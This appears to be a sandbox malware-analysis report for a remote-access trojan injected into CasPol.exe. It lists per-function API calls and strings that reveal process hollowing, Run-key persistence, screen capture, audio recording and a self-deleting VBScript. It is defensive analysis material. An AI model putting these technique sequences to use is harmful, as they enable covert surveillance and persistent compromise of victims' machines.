Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615

Function 00417FAF Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 324windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
CreateCompatibleDC.GDI32(00000000), ref: 00417FD4

Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492

CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
DeleteDC.GDI32(?), ref: 0041806D
DeleteDC.GDI32(00000000), ref: 00418070
SelectObject.GDI32(00000000,00000000), ref: 0041807B
StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
GetIconInfo.USER32(?,?), ref: 004180DB
DeleteObject.GDI32(?), ref: 0041810A
DeleteObject.GDI32(?), ref: 00418117
DrawIcon.USER32(00000000,?,?,?), ref: 00418124
BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
GetObjectA.GDI32(?,00000018,?), ref: 00418183
LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
DeleteDC.GDI32(?), ref: 0041828F
DeleteDC.GDI32(00000000), ref: 00418292
DeleteObject.GDI32(00000000), ref: 00418295
GlobalFree.KERNEL32(00CC0020), ref: 004182A0
DeleteObject.GDI32(00000000), ref: 00418354
GlobalFree.KERNEL32(?), ref: 0041835B
DeleteDC.GDI32(?), ref: 0041836B
DeleteDC.GDI32(00000000), ref: 00418376
DeleteDC.GDI32(?), ref: 004183A8
DeleteDC.GDI32(00000000), ref: 004183AB
DeleteObject.GDI32(?), ref: 004183B1

Strings

DISPLAY, xrefs: 00417FC2

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
String ID: DISPLAY
API String ID: 1765752176-865373369
Opcode ID: 2257ed1409e9a1961a9d9eafba920a0f4d075fe48bda2856ce6cfd6cf2fe1e18
Instruction ID: 6b2ada92df8522405a2cca839f58df11a8e30ba3d3d74bda048dad66fb1953bf
Opcode Fuzzy Hash: 2257ed1409e9a1961a9d9eafba920a0f4d075fe48bda2856ce6cfd6cf2fe1e18
Instruction Fuzzy Hash: 39C17C71508344AFD3209F25DC44BABBBE9FF88751F04092EF989932A1DB34E945CB5A

Function 00417245 Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 290libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
GetProcAddress.KERNEL32(00000000), ref: 0041728F
GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
GetProcAddress.KERNEL32(00000000), ref: 004172A3
GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
GetProcAddress.KERNEL32(00000000), ref: 004172B7
GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
GetProcAddress.KERNEL32(00000000), ref: 004172CB
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
TerminateProcess.KERNEL32(?,00000000), ref: 00417454
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
SetThreadContext.KERNEL32(?,00000000), ref: 00417575
ResumeThread.KERNEL32(?), ref: 00417582
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
GetCurrentProcess.KERNEL32(?), ref: 004175A5
TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
GetLastError.KERNEL32 ref: 004175C7

Strings

`#v, xrefs: 00417266
ntdll, xrefs: 00417277, 00417296, 004172AA, 004172BE
ZwClose, xrefs: 004172B9
ZwMapViewOfSection, xrefs: 00417291
ZwCreateSection, xrefs: 00417272
ZwUnmapViewOfSection, xrefs: 004172A5

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
API String ID: 4188446516-108836778
Opcode ID: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
Instruction ID: 2a1bc7bdc729258c18c32f0bb95ec7660c06bfb5025054df3919bc75ccc59624
Opcode Fuzzy Hash: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
Instruction Fuzzy Hash: DFA17CB1508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E779E984CB6A

Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
ExitProcess.KERNEL32 ref: 0041151D

Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D

Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382

Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809

PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B

Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000), ref: 0041B61C

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1

Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE

Strings

WDH, xrefs: 00411389, 004114F8
0DG, xrefs: 004112C3
.exe, xrefs: 0041142F
@CG, xrefs: 004112E2
open, xrefs: 0041147D
T@, xrefs: 00411361
exepath, xrefs: 00411308
temp_, xrefs: 0041141D

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
API String ID: 4250697656-2665858469
Opcode ID: c9acd2e96293917bda9fc8cf2da187a2ece0c5837e987d224152d2e05bc2ec87
Instruction ID: e3cce03e36166c77d6950284f165d3805ee2b23d785f43ba83868d4dcf2b0e5d
Opcode Fuzzy Hash: c9acd2e96293917bda9fc8cf2da187a2ece0c5837e987d224152d2e05bc2ec87
Instruction Fuzzy Hash: 1651B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D

Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7

Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3

Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE

ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
ExitProcess.KERNEL32 ref: 0040C63E

Strings

fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040C5E1
On Error Resume Next, xrefs: 0040C427
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040C330
exepath, xrefs: 0040C365
""", 0, xrefs: 0040C555
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040C56F
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040C418
while fso.FileExists(", xrefs: 0040C45A
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040C2DF
fso.DeleteFolder ", xrefs: 0040C519
`=G, xrefs: 0040C2C9
"), xrefs: 0040C443
wend, xrefs: 0040C4F7
Temp, xrefs: 0040C3EE
open, xrefs: 0040C62C
fso.DeleteFile ", xrefs: 0040C4A8
@CG, xrefs: 0040C33D
\update.vbs, xrefs: 0040C3E9

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-3168347843
Opcode ID: 6219edeefd560ff486394858dd9c1c9d22ab8a13fa2cd0cd7aa5e513517a661c
Instruction ID: 0897204671ac35a997fd8cee39da091aa0ef4b51e820d3179f4d1f6ac17f39c2
Opcode Fuzzy Hash: 6219edeefd560ff486394858dd9c1c9d22ab8a13fa2cd0cd7aa5e513517a661c
Instruction Fuzzy Hash: CD9184316042005AC314FB25D852ABF7799AF91318F10453FF98AA31E2EF7CAD49C69E

Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065

Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3

Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F

ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
ExitProcess.KERNEL32 ref: 0040C287

Strings

fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040C22F
On Error Resume Next, xrefs: 0040C102
`=G, xrefs: 0040BF3F
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040BFA6
@CG, xrefs: 0040BFCC
exepath, xrefs: 0040BFEF
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040C0F3
while fso.FileExists(", xrefs: 0040C136
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040BF55
fso.DeleteFolder ", xrefs: 0040C1F8
"), xrefs: 0040C11F
wend, xrefs: 0040C1D2
.vbs, xrefs: 0040C06F
Temp, xrefs: 0040C0B4
open, xrefs: 0040C27A
fso.DeleteFile ", xrefs: 0040C183
pth_unenc, xrefs: 0040BF0A

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
API String ID: 3797177996-1998216422
Opcode ID: 92fe1a40fcd02945d331df6cf61fadf3435f0996d79fe2ddfa73a677218823cf
Instruction ID: f1dcdd4a9e546d4cb200c8239a9b7392f8c22d31b5939825df829b517cfed74e
Opcode Fuzzy Hash: 92fe1a40fcd02945d331df6cf61fadf3435f0996d79fe2ddfa73a677218823cf
Instruction Fuzzy Hash: 088190316042005BC315FB21D852ABF77A9ABD1308F10453FF986A71E2EF7CAD49869E

Function 0041A1CB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
SetEvent.KERNEL32 ref: 0041A39A
WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
CloseHandle.KERNEL32 ref: 0041A3BB
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7

Strings

pause audio, xrefs: 0041A34B
" type , xrefs: 0041A25B
resume audio, xrefs: 0041A363
close audio, xrefs: 0041A3E2
play audio, xrefs: 0041A2D1
stop audio, xrefs: 0041A3D8
open ", xrefs: 0041A256
>G, xrefs: 0041A28F, 0041A20F
alias audio, xrefs: 0041A23E
stopped, xrefs: 0041A383
status audio mode, xrefs: 0041A378

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
API String ID: 738084811-1408154895
Opcode ID: f25ac0aab84e41d79845b7fc1309ac5f9c6375715bc9538c063ff5da4453c961
Instruction ID: 916def08b3adcafa46b043c64cdff30cc67d21214e861a912cda69be872b019d
Opcode Fuzzy Hash: f25ac0aab84e41d79845b7fc1309ac5f9c6375715bc9538c063ff5da4453c961
Instruction Fuzzy Hash: B951C1712442056AD214BB31DC86EBF3B9CDB91758F10043FF456A21E2EF389D9986AF

Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42

Strings

WAVE, xrefs: 00401C98
data, xrefs: 00401D2C
fmt , xrefs: 00401CA8
RIFF, xrefs: 00401C78

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3

Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
GetProcAddress.KERNEL32(00000000), ref: 004064FD
GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
GetProcAddress.KERNEL32(00000000), ref: 00406511
GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
GetProcAddress.KERNEL32(00000000), ref: 00406525
GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
GetProcAddress.KERNEL32(00000000), ref: 00406539
GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
GetProcAddress.KERNEL32(00000000), ref: 0040654D
GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
GetProcAddress.KERNEL32(00000000), ref: 00406561

Strings

ntdll.dll, xrefs: 004064E8, 004064F3, 0040650D, 00406521, 00406535, 00406549, 0040655D
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, xrefs: 004064E1
RtlInitUnicodeString, xrefs: 004064EE
NtFreeVirtualMemory, xrefs: 0040651C
RtlAcquirePebLock, xrefs: 00406530
NtAllocateVirtualMemory, xrefs: 00406508
RtlReleasePebLock, xrefs: 00406544
LdrEnumerateLoadedModules, xrefs: 00406558

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
API String ID: 1646373207-165202446
Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D

Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040BC75
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
_wcslen.LIBCMT ref: 0040BD54
CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040BDF2
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
_wcslen.LIBCMT ref: 0040BE34
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
ExitProcess.KERNEL32 ref: 0040BED0

Strings

6, xrefs: 0040BD48
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, xrefs: 0040BCFF, 0040BD04, 0040BD37, 0040BDEC, 0040BDF1, 0040BDF8, 0040BE59
del, xrefs: 0040BE63
BG, xrefs: 0040BCE1
open, xrefs: 0040BEB2
BG, xrefs: 0040BCB6

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open$BG$BG
API String ID: 1579085052-1280438975
Opcode ID: 7e825e1316c52805ca15a361a92a31a639e789ac11549bf6dbe0440ae5e66784
Instruction ID: 2f106158a8217a69bc194f5c9bf89c81f007fa4859a00edafeef48886470f02c
Opcode Fuzzy Hash: 7e825e1316c52805ca15a361a92a31a639e789ac11549bf6dbe0440ae5e66784
Instruction Fuzzy Hash: DC51B1212082006BD609B722EC52E7F77999F81719F10443FF985A66E2DF3CAD4582EE

Function 0041B1CB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0041B1E6
_memcmp.LIBVCRUNTIME ref: 0041B1FE
lstrlenW.KERNEL32(?), ref: 0041B217
FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
_wcslen.LIBCMT ref: 0041B2EB
FindVolumeClose.KERNEL32(?), ref: 0041B30B
GetLastError.KERNEL32 ref: 0041B323
GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
lstrcatW.KERNEL32(?,?), ref: 0041B369
lstrcpyW.KERNEL32(?,?), ref: 0041B378
GetLastError.KERNEL32 ref: 0041B380

Strings

?, xrefs: 0041B27D

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
String ID: ?
API String ID: 3941738427-1684325040
Opcode ID: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
Instruction ID: cf02e0f6f7b7a0e02f5bf76754478950043962dc0518326da89db1c5b002f683
Opcode Fuzzy Hash: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
Instruction Fuzzy Hash: CC4163715087099BD7209FA0EC889EBB7E8EF44755F00093BF951C2261E778C998C7D6

Function 0044E21E Relevance: 25.9, APIs: 17, Instructions: 419COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044E2B0
_free.LIBCMT ref: 0044E2D6
_free.LIBCMT ref: 0044E2FF
_free.LIBCMT ref: 0044E337
_free.LIBCMT ref: 0044E368
_free.LIBCMT ref: 0044E3A9
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044E42A
_free.LIBCMT ref: 0044E443
_wcschr.LIBVCRUNTIME ref: 0044E480
_free.LIBCMT ref: 0044E4EC
_free.LIBCMT ref: 0044E512
_free.LIBCMT ref: 0044E53B
_free.LIBCMT ref: 0044E570
_free.LIBCMT ref: 0044E5A1
_free.LIBCMT ref: 0044E5E2
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E667
